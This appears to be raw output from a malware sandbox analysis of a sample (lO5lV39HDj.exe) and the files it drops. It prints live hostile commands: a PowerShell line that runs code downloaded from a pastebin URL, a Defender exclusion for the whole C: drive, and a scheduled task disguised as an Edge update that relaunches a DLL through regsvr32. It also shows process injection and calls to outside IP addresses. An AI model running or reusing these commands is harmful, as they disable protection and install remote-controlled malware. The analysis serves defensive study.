Source: C:\Users\user\Downloads\ST.exe	Memory allocated: 2260000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: 9200000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: A200000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: A3D0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: B3D0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: B770000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: C770000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: D770000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Window / User API: threadDelayed 383	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Window / User API: threadDelayed 375	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Window / User API: threadDelayed 682	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4679	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5135	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6594	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2959	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 4777
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 4917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1690
Source: C:\Users\user\Downloads\ST.exe	Window / User API: threadDelayed 4150
Source: C:\Users\user\Downloads\ST.exe	Window / User API: threadDelayed 5672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7035
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2609
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1862

Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9_4.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RK870.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RK870.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RK870.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-SHGPV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-N5K6F.tmp	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep count: 4679 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep count: 5135 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576	Thread sleep count: 6594 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576	Thread sleep count: 2959 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 5508	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 5464	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep count: 7912 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep count: 1690 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -53000s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52887s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52757s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52641s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52516s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52406s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52293s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52188s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -52063s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51938s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51813s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51703s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51591s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51477s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51375s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51266s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51125s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -51015s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50900s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50589s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50467s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50359s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50250s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50138s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -50026s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49906s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49797s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49688s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49563s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49438s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49328s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49219s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -49094s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48984s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48875s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48760s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48654s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48546s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48433s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -48097s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47803s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47672s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47547s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47423s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47297s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47188s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -47063s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46937s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46828s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46719s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46610s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46485s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46360s >= -30000s
Source: C:\Users\user\Downloads\ST.exe TID: 4084	Thread sleep time: -46235s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288	Thread sleep count: 7035 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5288	Thread sleep count: 2609 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep count: 7769 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800	Thread sleep count: 1862 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 53000
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52887
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52757
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52641
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52516
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52406
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52293
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52188
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 52063
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51938
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51813
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51703
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51591
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51477
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51375
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51266
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51125
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 51015
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50900
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50589
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50467
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50359
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50250
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50138
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 50026
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49906
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49797
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49688
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49563
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49438
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49328
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49219
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 49094
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48984
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48875
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48760
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48654
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48546
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48433
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 48097
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47803
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47672
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47547
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47423
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47297
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47188
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 47063
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46937
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46828
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46719
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46610
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46485
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46360
Source: C:\Users\user\Downloads\ST.exe	Thread delayed: delay time: 46235
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: BT.tmp, 0000000D.00000002.1513963430.0000000000686000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BT.tmp, 0000000D.00000002.1513963430.0000000000686000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: regsvr32.exe, 00000011.00000003.2365508780.000000001C182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lO5lV39HDj.exe, 00000001.00000003.1840598106.0000015A0B57E000.00000004.00000020.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000003.2282442267.0000015A0B57E000.00000004.00000020.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000003.1984900066.0000015A0B57E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: powershell.exe, 00000004.00000002.1364454256.000002B7AD340000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Downloads\ST.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\lO5lV39HDj.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 185.147.124.146 4782
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 195.201.57.90 443

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Downloads\ST.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\lO5lV39HDj.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"

Injects a PE file into a foreign processes

Source: C:\Users\user\Downloads\ST.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 449000
Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47C000
Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
Source: C:\Users\user\Downloads\ST.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 77D008

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Users\user\Downloads\BT.exe "C:\Users\user\Downloads\BT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Users\user\Downloads\ST.exe "C:\Users\user\Downloads\ST.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5891.tmp" "c:\Users\user\AppData\Local\Temp\0nzyxcux\CSC9B1D91995BDA47B39210566D4DA539B4.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process created: C:\Users\user\Downloads\BT.exe "C:\Users\user\Downloads\BT.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Users\user\Downloads\ST.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\d3d9_4.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{05493815-7f3d-43af-9ebd-81b00854a622}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\d3d9_4.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{05493815-7f3d-43af-9ebd-81b00854a622}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
